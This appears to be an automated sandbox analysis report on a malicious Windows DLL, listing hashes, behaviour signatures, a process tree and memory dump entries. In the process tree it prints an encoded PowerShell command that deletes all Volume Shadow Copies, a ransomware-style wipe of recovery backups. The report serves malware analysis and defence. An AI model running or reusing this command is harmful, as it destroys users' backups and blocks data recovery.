Analysis

  • max time kernel
    122s
  • max time network
    130s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:54

General

  • Target

    db1320b53ae8e0de5a262ec93742a8f8ef65dd57955b724b39d691e0538de465.dll

  • Size

    164KB

  • MD5

    334d1fb660cca4c7175dc3ad17358052

  • SHA1

    c986d2ff01dd321b32076c75b8f492931e31e7c1

  • SHA256

    db1320b53ae8e0de5a262ec93742a8f8ef65dd57955b724b39d691e0538de465

  • SHA512

    8da4357907af0e07d3f560aeaf6959f4e12e63d52bd133d1b872a193368876685d1d18ee7c626358ec55cd60d9122a23d444051bb79f07eb3a0e1321193ea4a8

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\db1320b53ae8e0de5a262ec93742a8f8ef65dd57955b724b39d691e0538de465.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1264
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\db1320b53ae8e0de5a262ec93742a8f8ef65dd57955b724b39d691e0538de465.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1444
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:564
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1044

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/564-56-0x000007FEFB531000-0x000007FEFB533000-memory.dmp
    Filesize

    8KB

  • memory/564-59-0x0000000002542000-0x0000000002544000-memory.dmp
    Filesize

    8KB

  • memory/564-60-0x0000000002544000-0x0000000002547000-memory.dmp
    Filesize

    12KB

  • memory/564-58-0x0000000002540000-0x0000000002542000-memory.dmp
    Filesize

    8KB

  • memory/564-57-0x000007FEF2920000-0x000007FEF347D000-memory.dmp
    Filesize

    11.4MB

  • memory/564-61-0x000000001B6F0000-0x000000001B9EF000-memory.dmp
    Filesize

    3.0MB

  • memory/564-62-0x000000000254B000-0x000000000256A000-memory.dmp
    Filesize

    124KB

  • memory/1444-55-0x0000000075191000-0x0000000075193000-memory.dmp
    Filesize

    8KB